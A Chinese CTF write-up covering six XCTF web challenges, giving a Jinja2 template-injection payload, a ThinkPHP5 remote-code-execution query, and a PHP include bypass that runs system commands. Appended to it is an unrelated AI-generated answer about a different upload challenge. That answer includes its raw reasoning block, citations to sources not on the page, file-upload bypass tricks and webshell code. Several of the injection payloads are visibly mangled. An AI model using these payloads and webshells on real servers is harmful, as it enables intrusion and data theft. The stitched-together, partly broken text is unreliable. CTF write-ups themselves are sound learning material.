攻防世界——web高手进阶区(1~6)

本文介绍攻防世界Web高手进阶区1至6题的解题过程,包括baby_web、Training-WWW-Robots等挑战。通过利用各种Web漏洞获取flag,详细解析了从信息收集到漏洞利用的技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界——web高手进阶区(1~6)

(1)baby_web:

1.根据提示,在url中输入index.php,发现打开的仍然还是1.php
2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag

(2)Training-WWW-Robots:

直接先访问robots.txt:
在这里插入图片描述
然后在url在输入/fl0g.php,得到flag

(3)Web_python_template_injection:

首先构造/{{config}},没想到直接输出了全局变量的信息:

在这里插入图片描述

在执行管道命令
/{{’’.class.mro[2].subclasses()[59].init.func_globals.linecache.os.popen(‘ls’).read()}}
在这里插入图片描述
继续/{{’’.class.mro[2].subclasses()[59].init.func_globals.linecache.os.popen(‘cat fl4g’).read()}}
在这里插入图片描述
得到flag

(4)php_rce:

thinkphp5 漏洞利用
直接payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

在这里插入图片描述
得到flag

(5)Web_php_include:

打开网址,得到php代码提示

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

步骤:
1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。
2.默认页面为http://127.0.0.1/index.php,设置为page值,可确保while为真
3.利用hello参数将执行内容显示,flag如图所示

http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?system(%22ls%22);?%3E
http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?show_source(%22fl4gisisish3r3.php%22);?%3E

访问后

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
<?php
$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";
?>

得到flag

(6)supersqli:

此题博主基础有限,写不出好的解题思路,推荐攻防世界web进阶区supersqli
这里有详细的解体思路。

<think>嗯,用户需要关于攻防世界Web部分的Upload1挑战的解题思路或writeup。首先,我应该回忆一下常见的Upload类题目的常见漏洞点,比如文件上传绕过、黑名单过滤、MIME类型检查、.htaccess利用内容检测绕过等。 根据提供的引用,其他Upload题目如upload3可能涉及Git泄露、远程命令执行漏洞(如ThinkPHP的RCE)或者数据库中的敏感表字段。可能需要扫描目录,利用工具如GitHack获取源码,或者通过上传webshell获取flag。例如引用[2]提到通过Git泄露获取源码,引用[4]使用了ThinkPHP的RCE漏洞执行命令。 对于Upload1,可能类似的思路适用。首先需要检查是否有前端验证,比如文件类型、扩展名的检查,是否可以被绕过,比如修改Content-Type、使用双扩展名(如.php.jpg)、或者大小写绕过(如.PhP)。此外,服务器可能配置了黑名单,需要尝试上传.htaccess文件来允许执行特定扩展名,或者利用解析漏洞,比如Apache的解析顺序问题。 另外,可能需要结合其他漏洞,比如文件包含,通过上传图片马,然后利用文件包含漏洞执行其中的代码。或者检查是否有二次渲染,使用绕过技巧。也有可能上传后文件名被重命名,需要找到上传路径和文件名规律。 查看用户提供的引用,特别是引用[3]中提到secret_table和fl4g字段,可能提示需要数据库注入或读取文件,比如通过上传PHP文件执行系统命令读取flag。引用[4]中的RCE payload可能相关,如果存在框架漏洞的话。 综上,解题步骤可能包括:检查前端验证,尝试绕过文件类型检查;上传webshell或恶意文件;利用解析漏洞或.htaccess;结合其他漏洞如文件包含或RCE执行命令获取flag。需要分步骤测试,并参考已有的writeup中的常见方法。</think>### 攻防世界 Web Upload1 解题思路 #### 1. **题目初步分析** - **目标场景**:文件上传类挑战,通常需要绕过上传限制,上传恶意文件(如Webshell)或触发漏洞获取服务器权限。 - **常见限制**:扩展名黑名单、MIME类型检查、文件内容检测、路径重命名等[^1][^3]。 #### 2. **关键步骤与绕过方法** 1. **检查前端验证**: - 通过浏览器开发者工具查看前端代码,确认是否有扩展名过滤逻辑。若存在,可手动修改请求绕过(如Burp Suite拦截修改`filename`)[^2]。 - 示例Payload:上传`.php`文件,修改为`.php5`或`.phtml`(若服务器解析此类扩展名)。 2. **绕过MIME类型检测**: - 若服务器校验`Content-Type`,需伪造类型(如`image/jpeg`),但文件内容仍保留PHP代码。 - 示例上传请求头修改: ```http Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg ``` 3. **利用.htaccess文件覆盖**(适用于Apache服务器): - 上传`.htaccess`文件,配置特定扩展名解析为PHP: ```apache AddType application/x-httpd-php .abc ``` - 后续上传扩展名为`.abc`的Webshell即可执行。 4. **文件内容绕过**: - 若服务器检测文件内容关键字(如`<?php`),可替换为短标签`<?=`或使用编码/混淆技术。 - 示例代码: ```php <?= system($_GET['cmd']); ?> ``` 5. **结合其他漏洞**: - 若存在文件包含漏洞,可上传图片马(如包含PHP代码的JPEG文件),通过包含触发代码执行[^4]。 - 若服务器存在已知框架漏洞(如ThinkPHP RCE),直接构造Payload读取Flag。 #### 3. **实战示例** 假设题目限制上传`.php`但未过滤`.phar`: 1. 上传Webshell文件`shell.phar`,内容为: ```php <?php system("cat /flag"); ?> ``` 2. 访问上传路径`/uploads/shell.phar?cmd=ls`,触发命令执行。 #### 4. **扩展技巧** - **双写扩展名绕过**:如`shell.pphphp`,若过滤逻辑为删除`php`字符串。 - **大小写混淆**:如`shell.PhP`(Windows服务器不分大小写)。 - **利用解析漏洞**:如`shell.php.jpg`被Apache解析为PHP(需特定配置)。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值